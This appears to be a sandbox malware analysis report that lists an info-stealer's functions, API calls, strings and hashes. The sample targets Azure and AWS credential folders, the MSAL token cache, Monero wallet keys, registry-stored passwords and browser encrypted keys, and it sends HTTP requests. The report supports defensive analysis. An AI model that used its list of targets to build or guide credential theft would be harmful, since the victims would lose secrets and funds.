                                  Function 00724D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00724DCD
                                    • Part of subcall function 00724910: wsprintfA.USER32 ref: 0072492C
                                    • Part of subcall function 00724910: FindFirstFileA.KERNEL32(?,?), ref: 00724943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00724E59
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,00730FDC), ref: 00724971
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,00730FE0), ref: 00724987
                                    • Part of subcall function 00724910: FindNextFileA.KERNEL32(000000FF,?), ref: 00724B7D
                                    • Part of subcall function 00724910: FindClose.KERNEL32(000000FF), ref: 00724B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00724EE5
                                    • Part of subcall function 00724910: wsprintfA.USER32 ref: 007249B0
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,007308D2), ref: 007249C5
                                    • Part of subcall function 00724910: wsprintfA.USER32 ref: 007249E2
                                    • Part of subcall function 00724910: PathMatchSpecA.SHLWAPI(?,?), ref: 00724A1E
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,0122F5F8), ref: 00724A4A
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,00730FF8), ref: 00724A5C
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,?), ref: 00724A70
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,00730FFC), ref: 00724A82
                                    • Part of subcall function 00724910: lstrcat.KERNEL32(?,?), ref: 00724A96
                                    • Part of subcall function 00724910: CopyFileA.KERNEL32(?,?,00000001), ref: 00724AAC
                                    • Part of subcall function 00724910: DeleteFileA.KERNEL32(?), ref: 00724B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 788b297a14a91b6f45a646341f5e3b16be3aa34c9a270e11f5330ef4ca18e1f9
                                  • Instruction ID: e3f8c5ce28b74d7a7b628205be38233d71652893d297b2e66a0ff7284cc95b68
                                  • Opcode Fuzzy Hash: 788b297a14a91b6f45a646341f5e3b16be3aa34c9a270e11f5330ef4ca18e1f9
                                  • Instruction Fuzzy Hash: 4641B9BAA50318A7D754F770EC4BFDD3338AB24700F404594B689660C2EEB95BC98B93
                                  Function 00729010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0072906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: c01e9c19e6cf0b8022ae7b53bc574f365414d4a06d2f0e39693f4939c016f45e
                                  • Instruction ID: b9647ce3f370a9ae38c5da1715fee5623fabfed7ffb14929dbae1dbde9ec1b5c
                                  • Opcode Fuzzy Hash: c01e9c19e6cf0b8022ae7b53bc574f365414d4a06d2f0e39693f4939c016f45e
                                  • Instruction Fuzzy Hash: 07711C71910208EBDB04DFE5DC89FEEB7B9BF48301F148608F615AB290DB38A944DB65
                                  Function 00722E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007231C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0072335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007234EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 49307908df56df3dd6ae333c0b3820e9f769bcf03ddf07746b88523dd12f32f9
                                  • Instruction ID: 8374cf8294d2897125c6ce1024793e4c7cb9d9da5ffe8d82d457022391281a59
                                  • Opcode Fuzzy Hash: 49307908df56df3dd6ae333c0b3820e9f769bcf03ddf07746b88523dd12f32f9
                                  • Instruction Fuzzy Hash: D512F371810128EBDB15FBA0EC96FDDB778AF14300F504169F50666192EF386B8ACF96
                                  Function 007252C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 00716280: InternetOpenA.WININET(00730DFE,00000001,00000000,00000000,00000000), ref: 007162E1
                                    • Part of subcall function 00716280: StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00716303
                                    • Part of subcall function 00716280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00716335
                                    • Part of subcall function 00716280: HttpOpenRequestA.WININET(00000000,GET,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00716385
                                    • Part of subcall function 00716280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007163BF
                                    • Part of subcall function 00716280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007163D1
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00725318
                                  • lstrlen.KERNEL32(00000000), ref: 0072532F
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00725364
                                  • lstrlen.KERNEL32(00000000), ref: 00725383
                                  • lstrlen.KERNEL32(00000000), ref: 007253AE
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 5bee80b87595d12ec747a7508414fa099deb3c72ad8177045474f22c7fb7512d
                                  • Instruction ID: b92c716c545c43275b0691912b6f2157cb6725a14d5f9ce59b506db76d9e12ba
                                  • Opcode Fuzzy Hash: 5bee80b87595d12ec747a7508414fa099deb3c72ad8177045474f22c7fb7512d
                                  • Instruction Fuzzy Hash: ED512E70910158EBDB18FF64ED9AAED7779EF14301F504028F5065A192EF3C6B46CBA2
                                  Function 007212D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 5c42a5cd80b74e5b4c6037a8b1192b600b4703071aa088fc95e8bb77a31fb0a5
                                  • Instruction ID: 4bbeab97e9fbbbf7c0f8c8f1e4260d753a11b16abddc96f50d6e7ffb739c74aa
                                  • Opcode Fuzzy Hash: 5c42a5cd80b74e5b4c6037a8b1192b600b4703071aa088fc95e8bb77a31fb0a5
                                  • Instruction Fuzzy Hash: C5C1B7B5900229EBCB14EF60EC8DFEA7378BF64304F004599F50A67241DB78AA85DF95
                                  Function 00724280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007242EC
                                  • lstrcat.KERNEL32(?,0122F130), ref: 0072430B
                                  • lstrcat.KERNEL32(?,?), ref: 0072431F
                                  • lstrcat.KERNEL32(?,0122E0A8), ref: 00724333
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 00728D90: GetFileAttributesA.KERNEL32(00000000,?,00711B54,?,?,0073564C,?,?,00730E1F), ref: 00728D9F
                                    • Part of subcall function 00719CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00719D39
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                    • Part of subcall function 007293C0: GlobalAlloc.KERNEL32(00000000,007243DD,007243DD), ref: 007293D3
                                  • StrStrA.SHLWAPI(?,0122F028), ref: 007243F3
                                  • GlobalFree.KERNEL32(?), ref: 00724512
                                    • Part of subcall function 00719AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719AEF
                                    • Part of subcall function 00719AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00714EEE,00000000,?), ref: 00719B01
                                    • Part of subcall function 00719AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719B2A
                                    • Part of subcall function 00719AC0: LocalFree.KERNEL32(?,?,?,?,00714EEE,00000000,?), ref: 00719B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 007244A3
                                  • StrCmpCA.SHLWAPI(?,007308D1), ref: 007244C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007244D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 007244E5
                                  • lstrcat.KERNEL32(00000000,00730FB8), ref: 007244F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 3e6d2a89cf4f8725f0e2382e25dc7a8dc6ebead377268186d1796eb7c97c8122
                                  • Instruction ID: c51251bd6faa32eff55e814cfe4fc6350bc9cc267f5c161c44d7b9f2e10d26f7
                                  • Opcode Fuzzy Hash: 3e6d2a89cf4f8725f0e2382e25dc7a8dc6ebead377268186d1796eb7c97c8122
                                  • Instruction Fuzzy Hash: 3B7167B6910218BBDB14EBA4EC99FEE737DAB48300F004598F60597181EA39DB55CB92
                                  Function 00711310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007112B4
                                    • Part of subcall function 007112A0: RtlAllocateHeap.NTDLL(00000000), ref: 007112BB
                                    • Part of subcall function 007112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007112D7
                                    • Part of subcall function 007112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007112F5
                                    • Part of subcall function 007112A0: RegCloseKey.ADVAPI32(?), ref: 007112FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071134F
                                  • lstrlen.KERNEL32(?), ref: 0071135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00711377
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00711465
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 007114EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 9a0e579a7332a65f11c249b6b6856ea587a9f1fbe07f3182c463960122a32069
                                  • Instruction ID: cdf0841b7921fa80f6e0a69b305c1f0771e7c9e40c36dccc3aa2728121d38b7b
                                  • Opcode Fuzzy Hash: 9a0e579a7332a65f11c249b6b6856ea587a9f1fbe07f3182c463960122a32069
                                  • Instruction Fuzzy Hash: 0C5159B1D50129E7C715FB60EC96FED737CAF54300F4045A8B60A62082EE386B85CF96
                                  Function 007175D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0071733A
                                    • Part of subcall function 007172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007173B1
                                    • Part of subcall function 007172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0071740D
                                    • Part of subcall function 007172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00717452
                                    • Part of subcall function 007172D0: HeapFree.KERNEL32(00000000), ref: 00717459
                                  • lstrcat.KERNEL32(00000000,007317FC), ref: 00717606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00717648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 0071765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0071768F
                                  • lstrcat.KERNEL32(00000000,00731804), ref: 007176A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007176D3
                                  • lstrcat.KERNEL32(00000000,00731808), ref: 007176ED
                                  • task.LIBCPMTD ref: 007176FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
